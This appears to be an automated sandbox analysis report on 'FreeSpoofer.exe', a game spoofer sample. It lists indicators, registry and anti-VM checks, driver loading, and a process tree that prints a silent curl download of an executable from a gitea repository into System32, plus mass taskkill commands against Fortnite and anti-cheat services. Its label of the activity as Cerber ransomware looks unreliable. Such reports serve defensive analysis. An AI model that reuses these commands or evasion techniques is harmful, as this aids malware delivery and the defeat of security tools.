Analysis
max time kernel: 42s
max time network: 34s
platform: windows10-2004_x64
resource: win10v2004-20250129-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-02-2025 14:37
Behavioral task behavioral1: Sample FreeSpoofer.exe, Resource win7-20240903-en
Behavioral task behavioral2: Sample FreeSpoofer.exe, Resource win10v2004-20250129-en
General
Target: FreeSpoofer.exe
Size: 3.6MB
MD5: d8caeb46f4e99d53b24a27bc62e06551
SHA1: 6aa211685157b0a76435da5e40dd1c95c018e913
SHA256: 871ec8bf2237716e219a648c32f24cf8ad584a0f929076aa68dba0abe147b861
SHA512: 9b9797919fb26fd4a97a20c18a5292015ce3512211c5666487a09d5ab70ae6680be4d1e570bbc95bc47341675a51dad2fd9797be5d4d337421f40ab6fefad3bf
SSDEEP: 49152:7yWRDINFfPPHf/2sKVJOZqybgQccCRar1TVejyhTmhOoA6DCHoFIx71DuGLt:mWRQf/+ebgQccSaRuE76NKBDuG
Malware Config
Signatures
Cerber 41 IoCs
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
| description | ioc | pid | Process |
|---|---|---|---|
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 324 | taskkill.exe |
| | | 3940 | taskkill.exe |
| | | 3956 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 2132 | taskkill.exe |
| | | 1288 | taskkill.exe |
| | | 1228 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 2728 | taskkill.exe |
| | | 4892 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 4504 | taskkill.exe |
| | | 2528 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 1488 | taskkill.exe |
| | | 3128 | taskkill.exe |
| | | 2896 | taskkill.exe |
| | | 4900 | taskkill.exe |
| | | 4852 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 3304 | taskkill.exe |
| | | 4848 | taskkill.exe |
| | | 3044 | taskkill.exe |
| | | 5072 | taskkill.exe |
| | | 2828 | taskkill.exe |
| | | 3832 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| | | 3464 | taskkill.exe |
| | | 4376 | taskkill.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | | CupFixerx32.exe |
Cerber family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | FreeSpoofer.exe |
Downloads MZ/PE file 1 IoCs
| flow | pid | Process |
|---|---|---|
| 23 | 4492 | curl.exe |
Sets service image path in registry 2 TTPs 1 IoCs
| description | ioc | Process |
|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DyGNggtuuyEOAf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\DyGNggtuuyEOAf" | VXMapperV2.exe |
Stops running service(s) 4 TTPs
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | FreeSpoofer.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | FreeSpoofer.exe |
Executes dropped EXE 19 IoCs
| pid | Process |
|---|---|
| 3792 | VXMapperV2.exe |
| 1116 | CupFixerx32.exe |
| 3180 | CupFixerx32.exe |
| 2480 | CupFixerx32.exe |
| 2500 | CupFixerx32.exe |
| 4032 | CupFixerx32.exe |
| 8 | CupFixerx32.exe |
| 2980 | CupFixerx32.exe |
| 4284 | CupFixerx32.exe |
| 920 | CupFixerx32.exe |
| 2544 | CupFixerx32.exe |
| 1056 | CupFixerx32.exe |
| 4580 | CupFixerx32.exe |
| 4496 | CupFixerx32.exe |
| 4984 | CupFixerx32.exe |
| 4848 | CupFixerx32.exe |
| 3188 | CupFixerx32.exe |
| 2556 | CupFixerx32.exe |
| 3908 | CupFixerx32.exe |
| resource | yara_rule |
|---|---|
| behavioral2/memory/1036-0-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-2-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-3-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-4-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-37-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-38-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
| behavioral2/memory/1036-39-0x0000000140000000-0x00000001409C9000-memory.dmp | themida |
Checks whether UAC is enabled 1 TTPs 1 IoCs
| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | FreeSpoofer.exe |
Drops file in System32 directory 15 IoCs
| description | ioc | Process |
|---|---|---|
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING1.MAP | svchost.exe |
| File opened for modification | C:\Windows\System32\VXMapperV2.exe | FreeSpoofer.exe |
| File created | C:\Windows\System32\gsoftgmx64.sys | FreeSpoofer.exe |
| File opened for modification | C:\Windows\system32\wbem\repository | svchost.exe |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING2.MAP | svchost.exe |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING3.MAP | svchost.exe |
| File opened for modification | C:\Windows\System32\Spoofy.sys | FreeSpoofer.exe |
| File created | C:\Windows\System32\CupFixerx32.exe | FreeSpoofer.exe |
| File opened for modification | C:\Windows\System32\CupFixerx32.exe | FreeSpoofer.exe |
| File opened for modification | C:\Windows\System32\gsoftgmx64.sys | FreeSpoofer.exe |
| File opened for modification | C:\Windows\system32\wbem\repository\WRITABLE.TST | svchost.exe |
| File opened for modification | C:\Windows\system32\wbem\repository\OBJECTS.DATA | svchost.exe |
| File opened for modification | C:\Windows\system32\wbem\repository\INDEX.BTR | svchost.exe |
| File created | C:\Windows\System32\VXMapperV2.exe | curl.exe |
| File created | C:\Windows\System32\Spoofy.sys | FreeSpoofer.exe |
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
| pid | Process |
|---|---|
| 1036 | FreeSpoofer.exe |
Launches sc.exe 6 IoCs
Sc.exe is a Windows utility to control services on the system.
| pid | Process |
|---|---|
| 2408 | sc.exe |
| 4024 | sc.exe |
| 2752 | sc.exe |
| 4844 | sc.exe |
| 4356 | sc.exe |
| 3984 | sc.exe |
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
| pid | Process |
|---|---|
| 2556 | cmd.exe |
| 4724 | cmd.exe |
| 5060 | cmd.exe |
| 4064 | cmd.exe |
| 2988 | cmd.exe |
| 1748 | cmd.exe |
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
| pid | Process |
|---|---|
| 3844 | ipconfig.exe |
Kills process with taskkill 23 IoCs
| pid | Process |
|---|---|
| 2896 | taskkill.exe |
| 1488 | taskkill.exe |
| 3464 | taskkill.exe |
| 4852 | taskkill.exe |
| 2528 | taskkill.exe |
| 3956 | taskkill.exe |
| 4848 | taskkill.exe |
| 4892 | taskkill.exe |
| 5072 | taskkill.exe |
| 324 | taskkill.exe |
| 3940 | taskkill.exe |
| 3044 | taskkill.exe |
| 3304 | taskkill.exe |
| 1288 | taskkill.exe |
| 1228 | taskkill.exe |
| 2132 | taskkill.exe |
| 4376 | taskkill.exe |
| 4900 | taskkill.exe |
| 2828 | taskkill.exe |
| 2728 | taskkill.exe |
| 3832 | taskkill.exe |
| 4504 | taskkill.exe |
| 3128 | taskkill.exe |
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
| pid | Process |
|---|---|
| 3792 | VXMapperV2.exe |
| 3792 | VXMapperV2.exe |
Suspicious behavior: LoadsDriver 19 IoCs
| pid | Process |
|---|---|
| 3792 | VXMapperV2.exe |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
| 656 | Process not Found |
Suspicious use of AdjustPrivilegeToken 64 IoCs
| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 324 | taskkill.exe |
| Token: SeDebugPrivilege | 3940 | taskkill.exe |
| Token: SeDebugPrivilege | 2828 | taskkill.exe |
| Token: SeDebugPrivilege | 3044 | taskkill.exe |
| Token: SeDebugPrivilege | 4852 | taskkill.exe |
| Token: SeDebugPrivilege | 2528 | taskkill.exe |
| Token: SeDebugPrivilege | 3956 | taskkill.exe |
| Token: SeDebugPrivilege | 2728 | taskkill.exe |
| Token: SeDebugPrivilege | 3304 | taskkill.exe |
| Token: SeDebugPrivilege | 1228 | taskkill.exe |
| Token: SeDebugPrivilege | 3832 | taskkill.exe |
| Token: SeDebugPrivilege | 4848 | taskkill.exe |
| Token: SeDebugPrivilege | 2132 | taskkill.exe |
| Token: SeDebugPrivilege | 4892 | taskkill.exe |
| Token: SeDebugPrivilege | 4504 | taskkill.exe |
| Token: SeDebugPrivilege | 2896 | taskkill.exe |
| Token: SeDebugPrivilege | 1488 | taskkill.exe |
| Token: SeDebugPrivilege | 3128 | taskkill.exe |
| Token: SeDebugPrivilege | 3464 | taskkill.exe |
| Token: SeDebugPrivilege | 1288 | taskkill.exe |
| Token: SeDebugPrivilege | 4900 | taskkill.exe |
| Token: SeDebugPrivilege | 5072 | taskkill.exe |
| Token: SeDebugPrivilege | 4376 | taskkill.exe |
| Token: SeDebugPrivilege | 3792 | VXMapperV2.exe |
| Token: SeLoadDriverPrivilege | 3792 | VXMapperV2.exe |
| Token: SeIncreaseQuotaPrivilege | 840 | WMIC.exe |
| Token: SeSecurityPrivilege | 840 | WMIC.exe |
| Token: SeTakeOwnershipPrivilege | 840 | WMIC.exe |
| Token: SeLoadDriverPrivilege | 840 | WMIC.exe |
| Token: SeSystemProfilePrivilege | 840 | WMIC.exe |
| Token: SeSystemtimePrivilege | 840 | WMIC.exe |
| Token: SeProfSingleProcessPrivilege | 840 | WMIC.exe |
| Token: SeIncBasePriorityPrivilege | 840 | WMIC.exe |
| Token: SeCreatePagefilePrivilege | 840 | WMIC.exe |
| Token: SeBackupPrivilege | 840 | WMIC.exe |
| Token: SeRestorePrivilege | 840 | WMIC.exe |
| Token: SeShutdownPrivilege | 840 | WMIC.exe |
| Token: SeDebugPrivilege | 840 | WMIC.exe |
| Token: SeSystemEnvironmentPrivilege | 840 | WMIC.exe |
| Token: SeRemoteShutdownPrivilege | 840 | WMIC.exe |
| Token: SeUndockPrivilege | 840 | WMIC.exe |
| Token: SeManageVolumePrivilege | 840 | WMIC.exe |
| Token: 33 | 840 | WMIC.exe |
| Token: 34 | 840 | WMIC.exe |
| Token: 35 | 840 | WMIC.exe |
| Token: 36 | 840 | WMIC.exe |
| Token: SeAssignPrimaryTokenPrivilege | 3020 | svchost.exe |
| Token: SeIncreaseQuotaPrivilege | 3020 | svchost.exe |
| Token: SeSecurityPrivilege | 3020 | svchost.exe |
| Token: SeTakeOwnershipPrivilege | 3020 | svchost.exe |
| Token: SeLoadDriverPrivilege | 3020 | svchost.exe |
| Token: SeSystemtimePrivilege | 3020 | svchost.exe |
| Token: SeBackupPrivilege | 3020 | svchost.exe |
| Token: SeRestorePrivilege | 3020 | svchost.exe |
| Token: SeShutdownPrivilege | 3020 | svchost.exe |
| Token: SeSystemEnvironmentPrivilege | 3020 | svchost.exe |
| Token: SeUndockPrivilege | 3020 | svchost.exe |
| Token: SeManageVolumePrivilege | 3020 | svchost.exe |
| Token: SeAssignPrimaryTokenPrivilege | 3020 | svchost.exe |
| Token: SeIncreaseQuotaPrivilege | 3020 | svchost.exe |
| Token: SeSecurityPrivilege | 3020 | svchost.exe |
| Token: SeTakeOwnershipPrivilege | 3020 | svchost.exe |
| Token: SeLoadDriverPrivilege | 3020 | svchost.exe |
| Token: SeSystemtimePrivilege | 3020 | svchost.exe |
Suspicious use of WriteProcessMemory 64 IoCs
| description | pid | Process | procid_target |
|---|---|---|---|
| PID 1036 wrote to memory of 4772 | 1036 | FreeSpoofer.exe | 86 |
| PID 1036 wrote to memory of 4772 | 1036 | FreeSpoofer.exe | 86 |
| PID 1036 wrote to memory of 1960 | 1036 | FreeSpoofer.exe | 91 |
| PID 1036 wrote to memory of 1960 | 1036 | FreeSpoofer.exe | 91 |
| PID 1036 wrote to memory of 2500 | 1036 | FreeSpoofer.exe | 92 |
| PID 1036 wrote to memory of 2500 | 1036 | FreeSpoofer.exe | 92 |
| PID 1036 wrote to memory of 4032 | 1036 | FreeSpoofer.exe | 93 |
| PID 1036 wrote to memory of 4032 | 1036 | FreeSpoofer.exe | 93 |
| PID 4032 wrote to memory of 4492 | 4032 | cmd.exe | 94 |
| PID 4032 wrote to memory of 4492 | 4032 | cmd.exe | 94 |
| PID 1036 wrote to memory of 460 | 1036 | FreeSpoofer.exe | 95 |
| PID 1036 wrote to memory of 460 | 1036 | FreeSpoofer.exe | 95 |
| PID 1036 wrote to memory of 5088 | 1036 | FreeSpoofer.exe | 96 |
| PID 1036 wrote to memory of 5088 | 1036 | FreeSpoofer.exe | 96 |
| PID 5088 wrote to memory of 324 | 5088 | cmd.exe | 97 |
| PID 5088 wrote to memory of 324 | 5088 | cmd.exe | 97 |
| PID 1036 wrote to memory of 5060 | 1036 | FreeSpoofer.exe | 99 |
| PID 1036 wrote to memory of 5060 | 1036 | FreeSpoofer.exe | 99 |
| PID 5060 wrote to memory of 3940 | 5060 | cmd.exe | 100 |
| PID 5060 wrote to memory of 3940 | 5060 | cmd.exe | 100 |
| PID 1036 wrote to memory of 4064 | 1036 | FreeSpoofer.exe | 101 |
| PID 1036 wrote to memory of 4064 | 1036 | FreeSpoofer.exe | 101 |
| PID 4064 wrote to memory of 2828 | 4064 | cmd.exe | 102 |
| PID 4064 wrote to memory of 2828 | 4064 | cmd.exe | 102 |
| PID 1036 wrote to memory of 2988 | 1036 | FreeSpoofer.exe | 103 |
| PID 1036 wrote to memory of 2988 | 1036 | FreeSpoofer.exe | 103 |
| PID 2988 wrote to memory of 3044 | 2988 | cmd.exe | 104 |
| PID 2988 wrote to memory of 3044 | 2988 | cmd.exe | 104 |
| PID 1036 wrote to memory of 3232 | 1036 | FreeSpoofer.exe | 105 |
| PID 1036 wrote to memory of 3232 | 1036 | FreeSpoofer.exe | 105 |
| PID 3232 wrote to memory of 4852 | 3232 | cmd.exe | 106 |
| PID 3232 wrote to memory of 4852 | 3232 | cmd.exe | 106 |
| PID 1036 wrote to memory of 1212 | 1036 | FreeSpoofer.exe | 107 |
| PID 1036 wrote to memory of 1212 | 1036 | FreeSpoofer.exe | 107 |
| PID 1212 wrote to memory of 2528 | 1212 | cmd.exe | 108 |
| PID 1212 wrote to memory of 2528 | 1212 | cmd.exe | 108 |
| PID 1036 wrote to memory of 2112 | 1036 | FreeSpoofer.exe | 109 |
| PID 1036 wrote to memory of 2112 | 1036 | FreeSpoofer.exe | 109 |
| PID 2112 wrote to memory of 3956 | 2112 | cmd.exe | 110 |
| PID 2112 wrote to memory of 3956 | 2112 | cmd.exe | 110 |
| PID 1036 wrote to memory of 4580 | 1036 | FreeSpoofer.exe | 111 |
| PID 1036 wrote to memory of 4580 | 1036 | FreeSpoofer.exe | 111 |
| PID 4580 wrote to memory of 2728 | 4580 | cmd.exe | 112 |
| PID 4580 wrote to memory of 2728 | 4580 | cmd.exe | 112 |
| PID 1036 wrote to memory of 2776 | 1036 | FreeSpoofer.exe | 113 |
| PID 1036 wrote to memory of 2776 | 1036 | FreeSpoofer.exe | 113 |
| PID 2776 wrote to memory of 3304 | 2776 | cmd.exe | 114 |
| PID 2776 wrote to memory of 3304 | 2776 | cmd.exe | 114 |
| PID 1036 wrote to memory of 1072 | 1036 | FreeSpoofer.exe | 115 |
| PID 1036 wrote to memory of 1072 | 1036 | FreeSpoofer.exe | 115 |
| PID 1072 wrote to memory of 1228 | 1072 | cmd.exe | 116 |
| PID 1072 wrote to memory of 1228 | 1072 | cmd.exe | 116 |
| PID 1036 wrote to memory of 1500 | 1036 | FreeSpoofer.exe | 117 |
| PID 1036 wrote to memory of 1500 | 1036 | FreeSpoofer.exe | 117 |
| PID 1500 wrote to memory of 3832 | 1500 | cmd.exe | 118 |
| PID 1500 wrote to memory of 3832 | 1500 | cmd.exe | 118 |
| PID 1036 wrote to memory of 4028 | 1036 | FreeSpoofer.exe | 119 |
| PID 1036 wrote to memory of 4028 | 1036 | FreeSpoofer.exe | 119 |
| PID 4028 wrote to memory of 4848 | 4028 | cmd.exe | 120 |
| PID 4028 wrote to memory of 4848 | 4028 | cmd.exe | 120 |
| PID 1036 wrote to memory of 1748 | 1036 | FreeSpoofer.exe | 121 |
| PID 1036 wrote to memory of 1748 | 1036 | FreeSpoofer.exe | 121 |
| PID 1748 wrote to memory of 2132 | 1748 | cmd.exe | 122 |
| PID 1748 wrote to memory of 2132 | 1748 | cmd.exe | 122 |
Processes
[1] C:\Users\Admin\AppData\Local\Temp\FreeSpoofer.exe (PID 1036)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\FreeSpoofer.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe (PID 4772)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 1960)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 2500)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 4032)
      cmdline: C:\Windows\system32\cmd.exe /c curl --silent "https://gitea.com/Jaxploit/VuxCheats/raw/branch/main/VXMapperV2.exe" --output C:\\Windows\\System32\\VXMapperV2.exe >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\curl.exe (PID 4492)
        cmdline: curl --silent "https://gitea.com/Jaxploit/VuxCheats/raw/branch/main/VXMapperV2.exe" --output C:\\Windows\\System32\\VXMapperV2.exe
        - Downloads MZ/PE file
        - Drops file in System32 directory
  [2] C:\Windows\system32\cmd.exe (PID 460)
      cmdline: C:\Windows\system32\cmd.exe /c cls
  [2] C:\Windows\system32\cmd.exe (PID 5088)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 324)
        cmdline: TASKKILL /f /im epicgameslauncher.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 5060)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 3940)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4064)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 2828)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2988)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 3044)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 3232)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteLauncher.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 4852)
        cmdline: TASKKILL /f /im FortniteLauncher.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 1212)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im UnrealCEFSubProcess.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 2528)
        cmdline: TASKKILL /f /im UnrealCEFSubProcess.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2112)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im CEFProcess.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 3956)
        cmdline: TASKKILL /f /im CEFProcess.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4580)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im EasyAntiCheat.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 2728)
        cmdline: TASKKILL /f /im EasyAntiCheat.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2776)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BEService.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 3304)
        cmdline: TASKKILL /f /im BEService.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 1072)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BEServices.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 1228)
        cmdline: TASKKILL /f /im BEServices.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 1500)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BattleEye.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 3832)
        cmdline: TASKKILL /f /im BattleEye.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4028)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&1
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 4848)
        cmdline: TASKKILL /f /im epicgameslauncher.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 1748)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\taskkill.exe (PID 2132)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping_EAC.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 2556)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
    [3] C:\Windows\system32\taskkill.exe (PID 4892)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4724)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE >nul 2>&1
      - System Network Configuration Discovery: Internet Connection Discovery
    [3] C:\Windows\system32\taskkill.exe (PID 4504)
        cmdline: TASKKILL /f /im FortniteClient-Win64-Shipping_BE.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 3428)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im FortniteLauncher.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 2896)
        cmdline: TASKKILL /f /im FortniteLauncher.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 5000)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im UnrealCEFSubProcess.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 1488)
        cmdline: TASKKILL /f /im UnrealCEFSubProcess.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 3616)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im CEFProcess.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 3128)
        cmdline: TASKKILL /f /im CEFProcess.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4956)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im EasyAntiCheat.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 3464)
        cmdline: TASKKILL /f /im EasyAntiCheat.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4208)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BEService.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 1288)
        cmdline: TASKKILL /f /im BEService.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4312)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BEServices.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 4900)
        cmdline: TASKKILL /f /im BEServices.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 336)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im BattleEye.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 5072)
        cmdline: TASKKILL /f /im BattleEye.EXE
        - Cerber
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 4380)
      cmdline: C:\Windows\system32\cmd.exe /c TASKKILL /f /im epicgameslauncher.EXE >nul 2>&1
    [3] C:\Windows\system32\taskkill.exe (PID 4376)
        cmdline: TASKKILL /f /im epicgameslauncher.EXE
